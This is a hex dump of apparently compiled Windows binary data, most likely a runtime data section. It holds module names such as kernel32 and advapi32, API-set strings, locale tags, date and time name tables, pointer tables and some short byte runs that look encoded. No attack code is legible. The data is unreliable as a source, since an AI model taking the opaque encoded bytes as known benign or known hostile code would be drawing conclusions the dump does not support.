5c46eaa8c968698000000f2668317f2660296f1f544e5a5f1f5c464a09b636c62668115f2660094f1f544e3a3f1f5c462a2f2668713f2660692f1f544e1a1f1f1c067fdba126685159ca639f7027e98cc643818828ed706e7c0069109b84000000000f1e1049cb6af91f1f140e43b636bc85b9ca63ef7b7c494e1f1a4b4e1e1a041e1048c248000f00000000000000000000000000000000aa0069109b84000000004863fa98ca7bf07a50d437c6736072f61a8b3b3e0e7f5964b73e88b6373e37c6729ba3c643818828ea766a52c845b47b858b3b3e0e7f7944b73e88b637bd84b97bf303d8db435b273c53d98828eb76437fc38a49733f0e7f2e13c3ca4940737f4e027d3904c3ca5158737f4e1a654875c3ca5950737f4e126d5b66cb42e169b636bcb884ca63ff52c643818828ea77efd3c38a49733f0e7f6e53cb42c941b636bc9ba7ca63e7ec68cbcb42c940cb42c940cb42c940c3871d5947c78047c68173fadadb435b273c0f0000000000000000000000000000aa0069109b8400000000ff1f2c000000000000000000000000008c151dcb6fcc68c36160c70d08cb47e47db4af2a9300338c151dcb6fcc68c361028705950075c77570cb47e47db4c3469300338c151dcb6fdc78c361a2c38a8a9b58c1c5680ca1dd70046cc1801a729a00b3c7ce35fbde3d20c3c62d8877f696006fd8cb47f46d9e0f8c151dc361a2c38a32fa48b93d0500c0cf9b554a4a9c9e0f8c151dcb6fcc68c361d9fa81cb47e47db4a7da6b00338c151dcb6fcc68c361a2c38a8a83e0365c7d006fd8cb47e47d9e0f8c151dcb6fcc68c36153bb02000048cb47e47db4f38e6b00338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db4e9946b00338c151dcb6fcc68c361a2c30e0d8800008b8340cb47e47db40a706c00338c151dcb6fcc68c36153bc05000048cb47e47db423596c00338c151dcb6fcc68c3616a3d3d80000000747fb2ba030000e8453e6c006fd8cb47e47d9e0f8c151dcb6fcc68c36153bd04000048cb47e47db4641e6c00338c151dcb6fcc68c36153be07000048cb47e47db49de76c00338c151dcb6fcc68c361a2c3c62580f9ae40006fd8cb47e47d9e0f8c151dcb6fcc68c36153b108000048cb47e47db4a8d26c00338c151dcb6fcc68c36153b108000048cb47e47db4c1bb6c00338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db45f642d00338c151dcb6fcc68c36161c61d18cb47e47db4764d2d00338c151dcb6fcc68c361a2c3c67d78cb47e47db466314100338c151dcb6fcc68c361a2c38a80b93d0500c0b4788db9251d00c0b47037f32beebdb901000048cb47e47d9e0f00000000000000000000000000008c151dcb6fcc68c361a2c38a32fa48b93d0500c0cf9b554a4a89cb47e47d9e0fcc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c089480100000000c881480100000000d69f480100000000e4ad480100000000f2bb4801000000006c234e01000000005e114e01000000004a054e010000000038774e0100000000a2e84b0100000000b6fc4b0100000000d09a4b0100000000e4ae4b0100000000004b4a01000000001e554a010000000032794a0100000000460d4a010000000062294a01000000007c374a010000000092d94a0100000000a8e34a0100000000c2894a0100000000d8934a0100000000eca74a0100000000feb54a0100000000125e4d0100000000206c4d010000000038744d01000000004c004d01000000005e124d01000000006e224d01000000007e324d010000000096da4d0100000000aee24d0100000000c68a4d0100000000eea24d0100000000fab64d010000000008454c0100000000165b4c0100000000206d4c01000000002e634c0100000000400d4c0100000000521f4c0100000000602d4c0100000000763b4c01000000008cc14c0100000000a2ef4c0100000000b8f54c0100000000c4894c0100000000d09d4c0100000000e0ad4c0100000000eca14c0100000000004e4f0100000000105e4f0100000000226c4f01000000002c624f010000000038764f0100000000440a4f010000000056184f010000000068264f010000000082cc4f01000000009cd24f0100000000aee04f0100000000bef04f0100000000cc824f0100000000de904f0100000000eaa44f0100000000f8b64f010000000008474e0100000000145b4e010000000028674e01000000007c334e0100000000000000000000000086cc4b0100000000743e4b010000000062284b01000000004e044b01000000003a704b01000000002e644b0100000000105a4b01000000000000000000000000a08c2c808101000010a9b9808101000000000000000000000000000000000000000000000000000068ed8580810100002c54788081010000d079a9808101000000000000000000000000000000000000ccb57980810100004ce1ad80810100004c35798081010000000000000000000000000000000000000000000000000000000000000000000090c9588181010000306a5b81810100000000000000000000c8fd3481810100002c062a8081010000b09a2a8081010000553b05050118194e451d1b0615041d06016e00000000000040763781810100002c062a8081010000b09a2a808101000062030544410d00030c02151d06016e00c0f63781810100002c062a8081010000b09a2a8081010000620305444113001318594e0b12574c090b09131c68000000487f368181010000ac802c808101000063101e8de10100000000000000000000000000000000000004040000000000002025968a1900000000000000000000000000000000000000000000000000000020e4c4808101000038fcc4808101000078bcc48081010000b87cc480810100006161646476766161707069693333323200000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6666696962626565727273732d2d6c6c31312d2d31312d2d31310000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d737379796e6e636368682d2d6c6c31312d2d32322d2d303000000000000000006b6b656572726e6e65656c6c3333323200000000000000000101000003030000462a1f322d00030c63000000000000000101000003030000462a1f35341700650101000003030000462a1f34221122370d191065000000000101000003030000462a1f20361122370d1910650000000002020000030300004927071d1d080d05131f26311b1d1d0a020d3f3606171d06012b3d780000000070b8c880810100008048c880810100008840c880810100009850c88081010000a860c88081010000b870c88081010000c800c88081010000d810c88081010000e42cc88081010000f038c88081010000f830c8808101000008c1c9808101000018d1c9808101000022ebc9808101000024edc9808101000030f9c9808101000038f1c980810100003cf5c980810100004089c98081010000448dc980810100004881c980810100004c85c980810100005099c980810100005891c9808101000064adc9808101000068a1c980810100006ca5c9808101000070b9c9808101000074bdc9808101000078b1c980810100007cb5c980810100008049c98081010000844dc980810100008841c980810100008c45c980810100009059c98081010000945dc980810100009851c980810100009c55c98081010000a069c98081010000a46dc98081010000a861c98081010000ac65c98081010000b079c98081010000b47dc98081010000b871c98081010000bc75c98081010000c009c98081010000c40dc98081010000c801c98081010000cc05c98081010000d019c98081010000d41dc98081010000d811c98081010000dc15c98081010000e029c98081010000f039c9808101000000caca808101000008c2ca808101000018d2ca808101000030faca8081010000408aca80810100005892ca808101000078b2ca80810100009852ca8081010000b872ca8081010000d812ca8081010000f832ca808101000020ebcb8081010000408bcb808101000068a3cb80810100008843cb8081010000b07bcb8081010000d01bcb8081010000e02bcb8081010000e42fcb8081010000f03bcb808101000000cccc808101000024e8cc808101000030fccc8081010000408ccc8081010000509ccc808101000070bccc8081010000905ccc8081010000b874cc8081010000e02ccc808101000008c5cd808101000038f5cd80810100005895cd8081010000804dcd8081010000a865cd8081010000d815cd808101000008c6ce808101000028e6ce808101000022ebc9808101000038f6ce8081010000509ece808101000070bece80810100008846ce8081010000a866ce80810100005f003d031216014c28000000000000005f003c0701060f6c5f002f111210020d6c000000000000005f002c071007020d006c0000000000005f002b1c011a10020d006c00000000005f003907120717020d006c00000000005f00291306171b1d11020d006c0000005f003c0f1e11020d006c00005f003a04030b6900000000005f002f04064402345f002d171607061b0a177400000000005f002a1b0f0d050e090b01640000000072171607061b0a175c280000204e0b12770000000000000020440109091111653d3d00003e003e003c003c00212100003d003d00211c3d005b065d00000000006f1f151713151b1d720000002d133e002a2a00002b002b002d002d002d2d00002b2b0000262600002d13142a2f2f0000252500003c3c00003c013d003e3e00003e033d002c2c0000280129007e7e00005e5e00007c7c0000260026007c007c002a173d002b163d002d103d002f123d0025183d003e00033d3c00013d261b3d007c413d005e633d006016101215030e0942270000000000006016141615030e094227000000000000601615020d004b2760140d09150a09412700000000000000600c030c020d4c530715151d0a4347121413164327000000601307061b07094027000000000000006016140312164544011607060716171b1d5527000000000060161306171b1d5244010909111d07094744011607060716171b1d5527000000600401030714191854430c011d07060716171b1d52430f031c06071742270000601310020d0d135244010909111d07094744011607060716171b1d552700000060161306171b1d52430c011d07060716171b1d52491d111713151b1d5527000060161306171b1d5244011607060716171b1d52491d111713151b1d552700000060161306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270000000060161f1b0601140d4c440d1a031c0d020608080b1a544d0c115727000000000060050d48561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000000000000060050d48561306171b1d5244011607060716171b1d52491d111713151b1d552760050d48561306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270060030c1f0959430c011d07060716171b1d52430f031c06071742270000000000601511105452171101071c070709402760250d48603206001d49000000000000600c030c020d4c56101215030e094227600c030c020d4c56101215030e0945430c011d07060716171b1d52430f031c0607174227204e0b122c065d0000000000204401090911113e065d000000000000600f0203074943020d001f1a0e40270060101c0d020608080b1a5444010909111145430f031c0607174227000000000060101c0d020608080b1a544401090911113e067d430f031c0607174227000000600d0c0f0f06020144561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000600d0c0f0f06020144561306171b1d5244011607060716171b1d52491d111713151b1d552700000060050d48561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000060050d48561306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000060041d170f0c040a434907071d1d080d05131f175246091d520727000000000060041d170f0c040a434115111d111d5444011607060716171b1d5246091d5207270000000000000060161306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000000000060161306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d552700000000000000600d0c0f0f06020144561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000000600c030c020d4c530715151d0a43541c1a1704054447121413164327000000006f1f151713151b1d520200022000000020742d09154564211610111b19041b1d5527000000000000206223121645632f0d12005364211610111b19041b1d52411554082800000000206223121645632f0d12005361330013185e27000000000020632f0d12005368210c171313110b115964211610111b19041b1d552700000020632c021d1c091111456f2d080f0617546c230c02151b1d55270000000000000000000000000000050500c0cb0b000000000000000000001d1d00c0c40400000000000000000000969600c0c404000000000000000000008d8d00c0c808000000000000000000008e8e00c0c808000000000000000000008f8f00c0c80800000000000000000000909000c0c80800000000000000000000919100c0c80800000000000000000000929200c0c80800000000000000000000939300c0c80800000000000000000000b4b602c0c80800000000000000000000b5b702c0c808000000000000000000000c0c000000000000030300000000000009090000000000006d6d737363636f6f7272656565652e2e64646c6c6c6c0000432c1d373d111d24221d0c06160073004c05498081010000000000000000000098d149808101000000000000000000005008588081010000104959808101000094dd49808101000094dd49808101000068254d8081010000cc814d8081010000305f6f80810100004c236f80810100000000000000000000eca549808101000010435380810100004c1f53808101000040317180810100007c0d71808101000064096d808101000094dd49808101000048216980810100000000000000000000000000000000000094dd4980810100000000000000000000f4bd49808101000094dd49808101000084cd498081010000602949808101000094dd49808101000060b1d18081010000b061d1808101000038fcc48081010000f021d1808101000030e2d280810100008052d28081010000e032d2808101000030e3d3808101000078bcc4808101000070a3d38081010000b063d38081010000f023d3808101000030e4d480810100008054d48081010000e034d480810100004095d580810100009045d5808101000020e4c48081010000b87cc48081010000e035d580810100006161707069692d2d6d6d73732d2d777769696e6e2d2d6161707070706d6d6f6f646465656c6c2d2d727275756e6e747469696d6d65652d2d6c6c31312d2d31312d2d31310000000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6464616174746565747469696d6d65652d2d6c6c31312d2d31312d2d313100006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d666669696c6c65652d2d6c6c32322d2d31312d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6c6c31312d2d32322d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6f6f626273736f6f6c6c6565747465652d2d6c6c31312d2d32322d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d707072726f6f636365657373737374746868727265656161646473732d2d6c6c31312d2d31312d2d32320000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737474727269696e6e67672d2d6c6c31312d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737979737369696e6e66666f6f2d2d6c6c31312d2d32322d2d3131000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d777769696e6e727274742d2d6c6c31312d2d31312d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d7878737374746161747465652d2d6c6c32322d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d7272747463636f6f727265652d2d6e6e747475757373656572722d2d777769696e6e64646f6f77772d2d6c6c31312d2d31312d2d3030000000006161707069692d2d6d6d73732d2d777769696e6e2d2d737365656363757572726969747479792d2d737379797373747465656d6d666675756e6e6363747469696f6f6e6e73732d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6b6b656572726e6e65656c6c333332322d2d7070616163636b6b6161676765652d2d636375757272727265656e6e74742d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d6464696961616c6c6f6f676762626f6f78782d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d777769696e6e64646f6f7777737374746161747469696f6f6e6e2d2d6c6c31312d2d31312d2d303000000000757573736565727233333232000000000202000012120000020200001212000002020000121200000202000012120000000000000e0e000047221137360700170b1a243102080a06022c2d6400000000080800001212000004040000121200004c0f0e2c112327061b0709223d78000004040000121200004c230c020d092b2f0c08313b230f0a0d44000000000000000101000016160000020200000202000003030000020200000404000018180000050500000d0d00000606000009090000070700000c0c0000080800000c0c0000090900000c0c00000a0a0000070700000b0b0000080800000c0c0000161600000d0d0000161600000f0f000002020000101000000d0d000011110000121200001212000002020000212100000d0d00003535000002020000414100000d0d000043430000020200005050000011110000525200000d0d0000535300000d0d00005757000016160000595900000b0b00006c6c00000d0d00006d6d000020200000707000001c1c000072720000090900000606000016160000808000000a0a0000818100000a0a000082820000090900008383000016160000848400000d0d000091910000292900009e9e00000d0d0000a1a1000002020000a4a400000b0b0000a7a700000d0d0000b7b7000011110000cece000002020000d7d700000b0b0000181f07000c0c0000f82fd7808101000008d0d8808101000018c0d8808101000028f0d880810100006a6a61612d2d4a4a50500000000000007a7a68682d2d43434e4e0000000000006b6b6f6f2d2d4b4b52520000000000007a7a68682d2d54545757000000000000000000000000000000dbdb808101000004dfdb808101000008d3db80810100000cd7db808101000010cbdb808101000014cfdb808101000018c3db80810100001cc7db808101000024ffdb808101000030ebdb808101000038e3db80810100004893db8081010000548fdb808101000060bbdb80810100006cb7db808101000070abdb808101000074afdb808101000078a3db80810100007ca7db8081010000805bdb8081010000845fdb80810100008853db80810100008c57db8081010000904bdb8081010000944fdb80810100009843db8081010000a07bdb8081010000a873db8081010000b46fdb8081010000bc67db80810100007ca7db8081010000c41fdb8081010000cc17db8081010000d40fdb8081010000e03bdb8081010000f02bdb8081010000f823db808101000008d4dc808101000014c8dc808101000018c4dc808101000020fcdc808101000030ecdc80810100004894dc808101000001010000000000005884dc808101000060bcdc808101000068b4dc808101000070acdc808101000078a4dc8081010000805cdc80810100008854dc8081010000904cdc8081010000a07cdc8081010000b06cdc8081010000c01cdc8081010000d804dc8081010000f02cdc808101000000dddd808101000018c5dd808101000020fddd808101000028f5dd808101000030eddd808101000038e5dd8081010000409ddd80810100004895dd8081010000508ddd80810100005885dd808101000060bddd808101000068b5dd808101000070addd808101000078a5dd80810100008855dd8081010000a07ddd8081010000b06ddd808101000038e5dd8081010000c01ddd8081010000d00ddd8081010000e03ddd8081010000f02ddd808101000008d6de808101000018c6de808101000030eede8081010000449ade80810100004c92de80810100005886de808101000070aede80810100009846de8081010000b06ede808101000053261b6e4d22016e5421106557320164543c1d7546341b695332157453261b0a051879004d22010a051879000000000054211016170518795732010a0b1617051879000000000000543c1d07011705187900000046341b0d05187900000000005332150107160518790000004a2b0f6e462307624d2c1372413102724d2c18794a3f1b6e4a3f196c41341267533615704f2c17744e21197644210663000000004a2b0f1b14130b79462307100714130b790000004d2c13110b6800004131021b056c00004a3f1b0b650000004a3f1915790000004134121206077400000000005336150411080f0717720000000000004f2c171b0d0717724e211913080f0717720000000000000044210606080f071772000000410c4d00501d4d00000000004d00624b004b5600790000000000000064000000480c6d0000006d4400480c59000000790000000048007257005749007300000000000000535375756e6e00004d4d6f6f6e6e000054547575656500005757656564640000545468687575000046467272696900005353616174740000535375756e6e646461617979000000004d4d6f6f6e6e64646161797900000000545475756565737364646161797900005757656564646e6e65657373646461617979000000000000545468687575727273736464616179790000000000000000464672726969646461617979000000005353616174747575727264646161797900000000000000004a4a61616e6e000046466565626200004d4d61617272000041417070727200004d4d6161797900004a4a75756e6e00004a4a75756c6c0000414175756767000053536565707000004f4f6363747400004e4e6f6f7676000044446565636300004a4a61616e6e757561617272797900004646656562627272757561617272797900000000000000004d4d616172726363686800000000000041417070727269696c6c0000000000004a4a75756e6e656500000000000000004a4a75756c6c7979000000000000000041417575676775757373747400000000535365657070747465656d6d6262656572720000000000004f4f636374746f6f62626565727200004e4e6f6f767665656d6d626265657272000000000000000044446565636365656d6d6262656572720000000041414d4d0000000050504d4d00000000000000004d4d4d4d2f2f646464642f2f79797979000000000000000064646464646464642c2c20204d4d4d4d4d4d4d4d2020646464642c2c202079797979797979790000484848483a3a6d6d6d6d3a3a73737373000000000000000065656e6e2d2d5555535300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000202020202020202020202020202020202020282828282828282828282020202020202020202020202020202020202020202020202020202020202020202020204848101010101010101010101010101010101010101010101010101010101010848484848484848484848484848484848484848410101010101010101010101010108181818181818181818181810101010101010101010101010101010101010101010101010101010101010101010101010101010110101010101010101010101082828282828282828282828202020202020202020202020202020202020202020202020202020202020202020202020202020202101010101010101020200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f210301070103010f010301070103011f010301070103010f010321070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f210301070103010f010301070103011f010301070103010f01032107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301fe0100000000000000f3f38081010000020200000000000008fbf38081010000030300000000000010e3f38081010000040400000000000018ebf38081010000050500000000000028dbf38081010000060600000000000030c3f38081010000070700000000000038cbf38081010000080800000000000040b3f38081010000090900000000000048bbf380810100000a0a00000000000050a3f380810100000b0b00000000000058abf380810100000c0c0000000000006093f380810100000d0d000000000000689bf380810100000e0e0000000000007083f380810100000f0f000000000000788bf3808101000010100000000000008073f380810100001111000000000000887bf3808101000012120000000000009063f380810100001313000000000000986bf380810100001414000000000000a053f380810100001515000000000000a85bf380810100001616000000000000b043f380810100001818000000000000b84bf380810100001919000000000000c033f380810100001a1a000000000000c83bf380810100001b1b000000000000d023f380810100001c1c000000000000d82bf380810100001d1d000000000000e013f380810100001e1e000000000000e81bf380810100001f1f000000000000f003f380810100002020000000000000f80bf38081010000212100000000000000f4f48081010000222200000000000008fcf48081010000232300000000000010e4f48081010000242400000000000018ecf48081010000252500000000000020d4f48081010000262600000000000028dcf48081010000272700000000000030c4f48081010000292900000000000038ccf480810100002a2a00000000000040b4f480810100002b2b00000000000048bcf480810100002c2c00000000000050a4f480810100002d2d00000000000058acf480810100002f2f0000000000006094f480810100003636000000000000689cf4808101000037370000000000007084f480810100003838000000000000788cf4808101000039390000000000008074f480810100003e3e000000000000887cf480810100003f3f0000000000009064f480810100004040000000000000986cf480810100004141000000000000a054f480810100004343000000000000a85cf480810100004444000000000000b044f480810100004646000000000000b84cf480810100004747000000000000c034f480810100004949000000000000c83cf480810100004a4a000000000000d024f480810100004b4b000000000000d82cf480810100004e4e000000000000e014f480810100004f4f000000000000e81cf480810100005050000000000000f004f480810100005656000000000000f80cf48081010000575700000000000000f5f580810100005a5a00000000000008fdf58081010000656500000000000010e5f580810100007f7f00000000000018edf58081010000010504000000000020d5f58081010000020604000000000030c5f58081010000030704000000000040b5f58081010000040004000000000028f0d88081010000050104000000000050a5f5808101000006020400000000006095f5808101000007030400000000007085f58081010000080c0400000000008075f58081010000090d040000000000b06ede80810100000b0f0400000000009065f580810100000c08040000000000a055f580810100000d09040000000000b045f580810100000e0a040000000000c035f580810100000f0b040000000000d025f580810100001014040000000000e015f580810100001115040000000000f82fd78081010000121604000000000018c0d880810100001317040000000000f005f58081010000141004000000000000f6f68081010000151104000000000010e6f68081010000161204000000000020d6f68081010000181c04000000000030c6f68081010000191d04000000000040b6f680810100001a1e04000000000050a6f680810100001b1f0400000000006096f680810100001c180400000000007086f680810100001d190400000000008076f680810100001e1a0400000000009066f680810100001f1b040000000000a056f680810100002024040000000000b046f680810100002125040000000000c036f680810100002226040000000000d026f680810100002327040000000000e016f680810100002420040000000000f006f68081010000252104000000000000f7f78081010000262204000000000010e7f78081010000272304000000000020d7f78081010000292d04000000000030c7f780810100002a2e04000000000040b7f780810100002b2f04000000000050a7f780810100002c280400000000006097f780810100002d29040000000000788ff780810100002f2b040000000000887ff780810100003236040000000000986ff780810100003430040000000000a85ff780810100003531040000000000b84ff780810100003632040000000000c83ff780810100003733040000000000d82ff78081010000383c040000000000e81ff78081010000393d040000000000f80ff780810100003a3e04000000000008f0f880810100003b3f04000000000018e0f880810100003e3a04000000000028d0f880810100003f3b04000000000038c0f88081010000404404000000000048b0f88081010000414504000000000058a0f8808101000043470400000000006890f8808101000044400400000000008078f8808101000045410400000000009068f880810100004642040000000000a058f880810100004743040000000000b048f88081010000494d040000000000c038f880810100004a4e040000000000d028f880810100004b4f040000000000e018f880810100004c48040000000000f008f880810100004e4a04000000000000f9f980810100004f4b04000000000010e9f98081010000505404000000000020d9f98081010000525604000000000030c9f98081010000565204000000000040b9f98081010000575304000000000050a9f980810100005a5e0400000000006099f9808101000065610400000000007089f980810100006b6f0400000000008079f980810100006c680400000000009069f980810100008185040000000000a059f980810100000109080000000000b049f98081010000040c08000000000008d0d88081010000070f080000000000c039f980810100000901080000000000d029f980810100000a02080000000000e019f980810100000c04080000000000f009f98081010000101808000000000000fafa8081010000131b08000000000010eafa8081010000141c08000000000020dafa8081010000161e08000000000030cafa80810100001a1208000000000040bafa80810100001d1508000000000058a2fa80810100002c240800000000006892fa80810100003b33080000000000807afa80810100003e36080000000000906afa8081010000434b080000000000a05afa80810100006b63080000000000b842fa8081010000010d0c0000000000c832fa808101000004080c0000000000d822fa8081010000070b0c0000000000e812fa808101000009050c0000000000f802fa80810100000a060c000000000008f3fb80810100000c000c000000000018e3fb80810100001a160c000000000028d3fb80810100003b370c000000000040bbfb80810100006b670c000000000050abfb80810100000111100000000000609bfb80810100000414100000000000708bfb80810100000717100000000000807bfb80810100000919100000000000906bfb80810100000a1a100000000000a05bfb80810100000c1c100000000000b04bfb80810100001a0a100000000000c03bfb80810100003b2b100000000000d02bfb80810100000115140000000000e01bfb80810100000410140000000000f00bfb8081010000071314000000000000fcfc8081010000091d14000000000010ecfc80810100000a1e14000000000020dcfc80810100000c1814000000000030ccfc80810100001a0e14000000000040bcfc80810100003b2f14000000000058a4fc808101000001191800000000006894fc808101000009111800000000007884fc80810100000a121800000000008874fc80810100000c141800000000009864fc80810100001a02180000000000a854fc80810100003b23180000000000c03cfc8081010000011d1c0000000000d02cfc808101000009151c0000000000e01cfc80810100000a161c0000000000f00cfc80810100001a061c000000000000fdfd80810100003b271c000000000018e5fd8081010000012120000000000028d5fd8081010000092920000000000038c5fd80810100000a2a20000000000048b5fd80810100003b1b20000000000058a5fd808101000001252400000000006895fd8081010000092d2400000000007885fd80810100000a2e2400000000008875fd80810100003b1f2400000000009865fd80810100000129280000000000a855fd80810100000921280000000000b845fd80810100000a22280000000000c835fd8081010000012d2c0000000000d825fd808101000009252c0000000000e815fd80810100000a262c0000000000f805fd8081010000013130000000000008f6fe8081010000093930000000000018e6fe80810100000a3a30000000000028d6fe8081010000013534000000000038c6fe8081010000093d34000000000048b6fe80810100000a3e34000000000058a6fe808101000001393800000000006896fe80810100000a323800000000007886fe8081010000013d3c00000000008876fe80810100000a363c00000000009866fe80810100000141400000000000a856fe80810100000a4a400000000000b846fe80810100000a4e440000000000c836fe80810100000a42480000000000d826fe80810100000a464c0000000000e816fe80810100000a5a500000000000f806fe808101000004787c000000000008f7ff80810100001a667c000000000018e7ff80810100006161727200000000626267670000000063636161000000007a7a68682d2d4343484853530000000063637373000000006464616100000000646465650000000065656c6c0000000065656e6e0000000065657373000000006666696900000000666672720000000068686565000000006868757500000000696973730000000069697474000000006a6a6161000000006b6b6f6f000000006e6e6c6c000000006e6e6f6f0000000070706c6c00000000707074740000000072726f6f000000007272757500000000686872720000000073736b6b0000000073737171000000007373767600000000747468680000000074747272000000007575727200000000696964640000000075756b6b00000000626265650000000073736c6c0000000065657474000000006c6c7676000000006c6c74740000000066666161000000007676696900000000686879790000000061617a7a0000000065657575000000006d6d6b6b0000000061616666000000006b6b61610000000066666f6f0000000068686969000000006d6d7373000000006b6b6b6b000000006b6b797900000000737377770000000075757a7a00000000747474740000000070706161000000006767757500000000747461610000000074746565000000006b6b6e6e000000006d6d72720000000073736161000000006d6d6e6e0000000067676c6c000000006b6b6f6f6b6b0000737379797272000064646969767600000000000000000000616172722d2d53534141000000000000626267672d2d42424747000000000000636361612d2d45455353000000000000636373732d2d43435a5a000000000000646461612d2d44444b4b000000000000646465652d2d4444454500000000000065656c6c2d2d47475252000000000000666669692d2d46464949000000000000666672722d2d46465252000000000000686865652d2d49494c4c000000000000686875752d2d48485555000000000000696973732d2d49495353000000000000696974742d2d494954540000000000006e6e6c6c2d2d4e4e4c4c0000000000006e6e62622d2d4e4e4f4f00000000000070706c6c2d2d50504c4c000000000000707074742d2d4242525200000000000072726f6f2d2d52524f4f000000000000727275752d2d52525555000000000000686872722d2d4848525200000000000073736b6b2d2d53534b4b000000000000737371712d2d41414c4c000000000000737376762d2d53534545000000000000747468682d2d54544848000000000000747472722d2d54545252000000000000757572722d2d50504b4b000000000000696964642d2d4949444400000000000075756b6b2d2d55554141000000000000626265652d2d4242595900000000000073736c6c2d2d53534949000000000000656574742d2d454545450000000000006c6c76762d2d4c4c56560000000000006c6c74742d2d4c4c5454000000000000666661612d2d49495252000000000000767669692d2d56564e4e000000000000686879792d2d41414d4d00000000000061617a7a2d2d41415a5a2d2d4c4c616174746e6e00000000656575752d2d454553530000000000006d6d6b6b2d2d4d4d4b4b00000000000074746e6e2d2d5a5a4141000000000000787868682d2d5a5a41410000000000007a7a75752d2d5a5a4141000000000000616166662d2d5a5a41410000000000006b6b61612d2d4747454500000000000066666f6f2d2d46464f4f000000000000686869692d2d49494e4e0000000000006d6d74742d2d4d4d5454000000000000737365652d2d4e4e4f4f0000000000006d6d73732d2d4d4d59590000000000006b6b6b6b2d2d4b4b5a5a0000000000006b6b79792d2d4b4b4747000000000000737377772d2d4b4b454500000000000075757a7a2d2d55555a5a2d2d4c4c616174746e6e00000000747474742d2d5252555500000000000062626e6e2d2d49494e4e000000000000707061612d2d49494e4e000000000000676775752d2d49494e4e000000000000747461612d2d49494e4e000000000000747465652d2d49494e4e0000000000006b6b6e6e2d2d49494e4e0000000000006d6d6c6c2d2d49494e4e0000000000006d6d72722d2d49494e4e000000000000737361612d2d49494e4e0000000000006d6d6e6e2d2d4d4d4e4e000000000000636379792d2d4747424200000000000067676c6c2d2d454553530000000000006b6b6f6f6b6b2d2d49494e4e000000007373797972722d2d53535959000000006464696976762d2d4d4d565600000000717175757a7a2d2d42424f4f000000006e6e73732d2d5a5a41410000000000006d6d69692d2d4e4e5a5a000000000000616172722d2d49495151000000000000646465652d2d4343484800000000000065656e6e2d2d47474242000000000000656573732d2d4d4d5858000000000000666672722d2d42424545000000000000696974742d2d434348480000000000006e6e6c6c2d2d424245450000000000006e6e6e6e2d2d4e4e4f4f000000000000707074742d2d50505454000000000000737372722d2d535350502d2d4c4c616174746e6e00000000737376762d2d4646494900000000000061617a7a2d2d41415a5a2d2d4343797972726c6c00000000737365652d2d535345450000000000006d6d73732d2d42424e4e00000000000075757a7a2d2d55555a5a2d2d4343797972726c6c00000000717175757a7a2d2d4545434300000000616172722d2d454547470000000000007a7a68682d2d48484b4b000000000000646465652d2d4141545400000000000065656e6e2d2d41415555000000000000656573732d2d45455353000000000000666672722d